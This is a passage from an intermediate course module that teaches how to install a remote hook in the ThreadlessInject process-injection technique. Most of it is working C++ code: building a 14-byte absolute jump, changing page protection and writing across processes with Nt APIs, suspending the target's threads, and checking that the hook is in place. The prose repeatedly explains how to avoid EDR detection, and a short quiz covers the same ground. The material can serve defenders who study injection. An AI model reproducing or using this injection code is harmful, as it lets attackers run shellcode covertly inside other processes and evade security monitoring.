Difficulty: Intermediate

Module 6: Installing the Remote Hook

The moment of truth: overwriting the target function's prologue to redirect execution.

The Final Step Before Execution

At this point, the shellcode and hook stub are sitting in executable memory inside the target process, waiting to be called. The only remaining step is to overwrite the first 14 bytes of the target function with a JMP instruction that redirects to the hook stub. This is the most dangerous operation in the entire chain because it modifies executable code in a running process. If another thread is executing within those 14 bytes while they are being overwritten, it can decode a mix of old and new bytes, and the process is likely to crash.

Constructing the Hook Jump

The hook is a 14-byte absolute jump that redirects execution from the target function's entry point to the hook stub in our allocated memory region:

C++
// Build the 14-byte absolute JMP that will overwrite the function prologue
BYTE hookJmp[14] = {0};

// JMP [RIP+0] - opcode FF 25, with 00000000 as RIP-relative offset
hookJmp[0] = 0xFF;
hookJmp[1] = 0x25;
// Bytes 2..5 stay zero: offset 0 means the address follows immediately

// The 8-byte absolute address of our hook stub in the remote process.
// memcpy avoids an unaligned, type-punned store (requires <cstring>).
UINT64 stubAddr = (UINT64)remoteHookStubAddr;
memcpy(hookJmp + 6, &stubAddr, sizeof(stubAddr));

// hookJmp now contains:
// FF 25 00 00 00 00 [8 bytes: address of hook stub]
// When executed, the CPU reads the 8 bytes after the JMP instruction
// and loads them into RIP, transferring control to our hook stub
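The byte layout described above can be checked in isolation, without touching any process. The following is a minimal, portable sketch; `buildAbsoluteJmp` is a hypothetical helper name introduced here for illustration and is not part of the original code. It writes the address byte by byte so the little-endian ordering is explicit.

```cpp
#include <array>
#include <cstddef>
#include <cstdint>

// Hypothetical helper (not from the original code): encodes
// FF 25 00 00 00 00 followed by the 64-bit target in little-endian order.
std::array<std::uint8_t, 14> buildAbsoluteJmp(std::uint64_t target) {
    std::array<std::uint8_t, 14> jmp{};   // zero-initialised, so bytes 2..5 (disp32) stay 0
    jmp[0] = 0xFF;                        // opcode byte
    jmp[1] = 0x25;                        // ModRM: JMP qword ptr [RIP + disp32]
    for (std::size_t i = 0; i < 8; ++i) {
        // Emit the address one byte at a time, least significant byte first.
        jmp[6 + i] = static_cast<std::uint8_t>(target >> (8 * i));
    }
    return jmp;
}
```

For a target of 0x00007FF812345678, the buffer is FF 25 00 00 00 00 78 56 34 12 F8 7F 00 00.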

Making the Target Function Writable

Code pages in a running process are typically mapped as PAGE_EXECUTE_READ (RX). You cannot write to them without first changing the page protection. This requires NtProtectVirtualMemory on the remote process:

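C++
// Step 1: Change the target function's page protection to RWX temporarily.
// NtProtectVirtualMemory rounds protectAddr/protectSize to page boundaries
// and writes the rounded values back into these variables.
PVOID protectAddr = (PVOID)hookedFuncAddr;
SIZE_T protectSize = 14;  // We only need to write 14 bytes
ULONG oldProtect = 0;

NTSTATUS status = NtProtectVirtualMemory(
    hProcess,
    &protectAddr,
    &protectSize,
    PAGE_EXECUTE_READWRITE,  // Temporarily make writable + executable
    &oldProtect              // Save old protection (should be PAGE_EXECUTE_READ)
);
if (!NT_SUCCESS(status)) return FALSE;  // Protection unchanged; nothing to undo

// Step 2: Write the 14-byte hook JMP over the function prologue
SIZE_T written = 0;
status = NtWriteVirtualMemory(
    hProcess,
    (PVOID)hookedFuncAddr,   // Destination: start of target function
    hookJmp,                 // Source: our 14-byte JMP
    sizeof(hookJmp),         // Size: exactly 14 bytes
    &written
);
BOOL writeOk = NT_SUCCESS(status) && written == sizeof(hookJmp);

// Step 3: Restore original page protection, even if the write failed
ULONG tempProtect = 0;
NtProtectVirtualMemory(
    hProcess,
    &protectAddr,            // Already page-aligned after Step 1
    &protectSize,
    oldProtect,              // Restore to original protection (RX)
    &tempProtect             // Receives the temporary RWX value
);
if (!writeOk) return FALSE;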
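Protection changes apply to whole pages, so a 14-byte request is widened to the page or pages that contain those bytes. The sketch below shows the arithmetic only, assuming a 4096-byte page size; `PageRange` and `coveringPages` are hypothetical names used for illustration. It also shows that a prologue starting near the end of a page spans two pages.

```cpp
#include <cstdint>

struct PageRange {
    std::uint64_t base;  // start address rounded down to a page boundary
    std::uint64_t size;  // length in bytes, a whole number of pages
};

// Hypothetical helper: computes the page-aligned region covering [addr, addr + len).
// pageSize must be a power of two; 4096 is an assumption, not queried from the OS.
PageRange coveringPages(std::uint64_t addr, std::uint64_t len,
                        std::uint64_t pageSize = 4096) {
    const std::uint64_t mask = pageSize - 1;
    const std::uint64_t base = addr & ~mask;                 // round start down
    const std::uint64_t end  = (addr + len + mask) & ~mask;  // round end up
    return PageRange{base, end - base};
}
```

With these assumptions, a 14-byte range at 0x7FF812345678 maps to one page at 0x7FF812345000, while the same range at 0x7FF812345FF8 crosses a boundary and covers 0x2000 bytes.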

The RWX Window

Notice that for a brief moment, the target function's code page has PAGE_EXECUTE_READWRITE protection. This state is transient: the protection is changed, the 14 bytes are written, and the protection is immediately restored. A memory scanner would have to sample the page at exactly the right moment to observe the RWX state, since the window typically lasts only microseconds. The protection change and the cross-process write themselves remain visible to anything that monitors those calls, and the modified bytes stay in place afterward. ThreadlessInject keeps the window short by performing the write immediately after the protection change.

Thread Safety During Hook Installation

The most dangerous race condition in any hooking technique is the moment of overwriting the target bytes. If a thread in the target process is executing the function at the exact instruction that you are overwriting, the thread will execute a partially-overwritten instruction and crash. Consider what happens step by step:

Race Condition: Partial Hook Write

Time T0: Original bytes are [48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 ...] (three 5-byte instructions)
Time T1: Thread A has executed the first instruction, so its RIP is at offset 5. Writer begins overwriting.
Time T2: Bytes are now [FF 25 00 00 00 00 XX XX XX XX 48 89 74 24 18 ...] (partially written; XX = stub address bytes)
Time T3: Thread A resumes at offset 5, which now lies inside the new JMP, and decodes 00 XX XX ... as an instruction: CRASH
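The timeline above depends on where the original instruction boundaries fall relative to the patch. As a rough sketch, the helper below lists the boundaries that land strictly inside a patch of a given length; these are the offsets at which a thread could be waiting to resume. The name `boundariesInsidePatch` is hypothetical, and the instruction lengths are supplied by the caller rather than decoded.

```cpp
#include <cstddef>
#include <vector>

// Hypothetical helper: given the lengths of the original instructions at the
// function entry, returns the instruction-boundary offsets that fall strictly
// inside a patch of patchLen bytes. Offset 0 is excluded because a thread
// entering there executes the new jump from its first byte.
std::vector<std::size_t> boundariesInsidePatch(
        const std::vector<std::size_t>& instrLengths, std::size_t patchLen) {
    std::vector<std::size_t> inside;
    std::size_t offset = 0;
    for (std::size_t len : instrLengths) {
        offset += len;                  // offset of the next instruction boundary
        if (offset >= patchLen) break;  // boundary is at or past the end of the patch
        inside.push_back(offset);
    }
    return inside;
}
```

For the prologue shown above (three 5-byte instructions), a 14-byte patch leaves boundaries at offsets 5 and 10 inside the patch, whereas a 5-byte patch leaves none.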

There are several strategies to mitigate this risk:

Strategy 1: Atomic 8-Byte Writes

On x86-64 processors, an 8-byte store to an 8-byte-aligned address is atomic. Unfortunately, our 14-byte hook exceeds this limit. There is an alternative: if the hook stub (or a nearby trampoline) lies within +/- 2 GB of the target, a 5-byte relative JMP (E9 xx xx xx xx) is sufficient. Padded to 8 bytes, the whole patch can be written with a single interlocked operation, provided the function's entry point is 8-byte aligned. Atomicity addresses the torn-write problem only; a thread whose RIP is already inside the 8 patched bytes can still resume into altered code.

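C++
// Atomic write strategy using InterlockedCompareExchange64
// This only works if your detour is within +/- 2GB (relative JMP range),
// the patch fits in 8 bytes, and hookedFuncAddr is 8-byte aligned

// Build an 8-byte patch: 5-byte relative JMP + 3 bytes of NOPs
BYTE patch[8] = {0};
INT64 distance = (INT64)hookStubAddr - (INT64)(hookedFuncAddr + 5);
if (distance < INT32_MIN || distance > INT32_MAX) return FALSE;  // Outside rel32 range
INT32 relOffset = (INT32)distance;
patch[0] = 0xE9;                                    // JMP rel32
memcpy(patch + 1, &relOffset, sizeof(relOffset));   // 32-bit relative offset
patch[5] = 0x90; patch[6] = 0x90; patch[7] = 0x90;  // NOP padding

// Atomic 8-byte write (in-process example; remote requires different approach).
// The page must already be writable for this to succeed.
LONG64 newValue;
memcpy(&newValue, patch, sizeof(newValue));
LONG64 expected = *(volatile LONG64*)hookedFuncAddr;  // Snapshot of the current bytes
LONG64 previous = InterlockedCompareExchange64(
    (volatile LONG64*)hookedFuncAddr,
    newValue,                             // New value (our JMP + NOPs)
    expected                              // Expected current value
);
if (previous != expected) return FALSE;   // Bytes changed underneath us; patch not applied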
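The relative JMP only works when the displacement fits in a signed 32-bit value, and the atomic write only applies to an 8-byte-aligned address. The following portable sketch checks both conditions and encodes the instruction. `encodeRelJmp` and `isEightByteAligned` are hypothetical helper names, and the addresses are treated as plain integers for illustration.

```cpp
#include <array>
#include <cstddef>
#include <cstdint>

// Hypothetical helper: encodes E9 rel32 for a jump located at `from` that
// should land on `to`. Returns false when the displacement does not fit in
// a signed 32-bit value, in which case `out` is left untouched.
bool encodeRelJmp(std::uint64_t from, std::uint64_t to,
                  std::array<std::uint8_t, 5>& out) {
    // rel32 is measured from the end of the 5-byte instruction.
    const std::int64_t disp = static_cast<std::int64_t>(to - (from + 5));
    if (disp < INT32_MIN || disp > INT32_MAX) return false;
    const std::uint32_t rel =
        static_cast<std::uint32_t>(static_cast<std::int32_t>(disp));
    out[0] = 0xE9;  // JMP rel32 opcode
    for (std::size_t i = 0; i < 4; ++i) {
        // Little-endian displacement, least significant byte first.
        out[1 + i] = static_cast<std::uint8_t>(rel >> (8 * i));
    }
    return true;
}

// Hypothetical helper: true when addr is suitable for an aligned 8-byte store.
bool isEightByteAligned(std::uint64_t addr) {
    return (addr & 7u) == 0;
}
```

A jump at 0x1000 targeting 0x2000 encodes as E9 FB 0F 00 00, because the displacement is 0x2000 - 0x1005 = 0xFFB. When the check fails, the 14-byte absolute form is the fallback.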

ThreadlessInject's Approach

In practice, ThreadlessInject uses the simpler NtWriteVirtualMemory approach for the full 14-byte overwrite. The rationale is that thread safety concerns are mitigated by choosing a target function that is not being actively executed at the moment of hook installation. If the function is one that threads call periodically (like a sleep or wait function), there is typically a window between calls where no thread is executing the prologue. The risk is accepted as low for well-chosen targets.

Strategy 2: Suspend/Resume Target Threads

A more robust (but noisier) approach is to suspend all threads in the target process before installing the hook, then resume them after:

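C++
// Suspend all threads in target process before hook installation
// WARNING: This is detectable and can cause deadlocks
// Requires <windows.h>, <tlhelp32.h>, and <vector>
HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
if (hSnap == INVALID_HANDLE_VALUE) return FALSE;

THREADENTRY32 te32;
te32.dwSize = sizeof(THREADENTRY32);

std::vector<HANDLE> threads;
if (Thread32First(hSnap, &te32)) {
    do {
        if (te32.th32OwnerProcessID == targetPid) {
            HANDLE hThread = OpenThread(THREAD_SUSPEND_RESUME, FALSE, te32.th32ThreadID);
            if (hThread) {
                if (SuspendThread(hThread) != (DWORD)-1) {
                    threads.push_back(hThread);   // Suspended: resume it later
                } else {
                    CloseHandle(hThread);         // Could not suspend: do not track it
                }
            }
        }
    } while (Thread32Next(hSnap, &te32));
}
CloseHandle(hSnap);  // The snapshot is no longer needed

// Install the hook: no target thread can run while the bytes change.
// A thread suspended inside the first 14 bytes will still resume into
// patched code, so suspension alone does not remove every hazard.
InstallHookJmp(hProcess, hookedFuncAddr, hookJmp);

// Resume all threads
for (HANDLE h : threads) {
    ResumeThread(h);
    CloseHandle(h);
}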

However, suspending threads is itself detectable (EDRs monitor SuspendThread calls targeting other processes) and can cause deadlocks if a suspended thread holds a lock that other code needs. ThreadlessInject avoids this approach in favor of the simpler non-atomic write with careful target selection.

Verifying Hook Installation

After writing the hook, a prudent implementation verifies that the write succeeded by reading back the bytes:

C++
// Verify the hook was installed correctly
BYTE verification[14] = {0};
SIZE_T bytesRead = 0;
NTSTATUS readStatus = NtReadVirtualMemory(
    hProcess, (PVOID)hookedFuncAddr, verification, sizeof(verification), &bytesRead);

// Compare with expected hook bytes
if (!NT_SUCCESS(readStatus) || bytesRead != sizeof(verification) ||
    memcmp(verification, hookJmp, sizeof(verification)) != 0) {
    // Hook installation failed - the read failed, another thread may have
    // modified the bytes, or an EDR may have blocked the write
    printf("[-] Hook verification failed!\n");
    // Cleanup: free remote memory, close handles
    return FALSE;
}
printf("[+] Hook installed successfully at 0x%p\n", (void*)hookedFuncAddr);
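A byte-for-byte comparison confirms the write, but it can also be useful to decode what is actually at the function entry, for example when inspecting a prologue for an existing hook. The sketch below is a portable illustration under that assumption; `decodeAbsoluteJmp` is a hypothetical helper that recognises only the exact FF 25 00 00 00 00 form used in this module.

```cpp
#include <cstddef>
#include <cstdint>

// Hypothetical helper: checks that buf starts with FF 25 00 00 00 00 and, if so,
// stores the little-endian 64-bit address that follows in `target`.
// Returns false (leaving `target` untouched) for any other byte pattern.
bool decodeAbsoluteJmp(const std::uint8_t* buf, std::size_t len,
                       std::uint64_t& target) {
    static const std::uint8_t kPrefix[6] = {0xFF, 0x25, 0x00, 0x00, 0x00, 0x00};
    if (buf == nullptr || len < 14) return false;
    for (std::size_t i = 0; i < 6; ++i) {
        if (buf[i] != kPrefix[i]) return false;  // not the expected JMP encoding
    }
    std::uint64_t value = 0;
    for (std::size_t i = 0; i < 8; ++i) {
        // Reassemble the address from its little-endian bytes.
        value |= static_cast<std::uint64_t>(buf[6 + i]) << (8 * i);
    }
    target = value;
    return true;
}
```

Applied to the bytes read back from the target, a successful decode whose result equals the hook stub address indicates that the expected jump is in place; an unmodified prologue such as 48 89 5C 24 08 ... is rejected.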

The Complete Installation Sequence

Putting it all together, here is the full sequence of operations for hook installation:

Hook Installation Timeline

1. Change target page protection: RX → RWX
2. Write 14-byte JMP over function prologue (NtWriteVirtualMemory)
3. Restore target page protection: RWX → RX
4. Verify hook bytes (NtReadVirtualMemory)
5. Hook is live — next call to target function triggers shellcode

What Happens Next

At this point, the hook is installed. The target function's first 14 bytes are now a JMP to your hook stub. The next time any thread in the target process calls that function, execution will transfer to the hook stub, which will save registers, call the shellcode, restore registers, execute the original prologue bytes, and jump back to the function. From the injector's perspective, the job is done — you can close the process handle and exit. The shellcode will execute asynchronously whenever a target thread calls the hooked function.

Pop Quiz: Installing the Remote Hook

Q1: Why must you change the target function's page protection before writing the hook?

DLL code sections (.text) are mapped with PAGE_EXECUTE_READ protection. This means the memory can be read and executed, but not written to. NtWriteVirtualMemory to this region fails (typically with STATUS_PARTIAL_COPY, because the copy faults on the read-only destination) unless you first change the protection to include write access.

Q2: Why does ThreadlessInject avoid suspending all threads before hook installation?

SuspendThread targeting threads in another process is monitored by EDRs and requires THREAD_SUSPEND_RESUME access, which adds to the detection surface. Additionally, if a suspended thread holds a critical section or mutex, other threads (or the entire process) may deadlock when they try to acquire that lock.

Q3: What is the advantage of a 5-byte relative JMP (E9) over the 14-byte absolute JMP (FF 25)?

A 5-byte relative JMP overwrites fewer bytes, which reduces the chance that a thread's RIP is inside the overwritten range when the write happens. More importantly, the 5-byte patch (plus 3 NOP bytes) fits in 8 bytes, which can be written atomically with an interlocked compare-exchange on x64 CPUs when the function's entry point is 8-byte aligned. The downside is the +/- 2GB range limitation.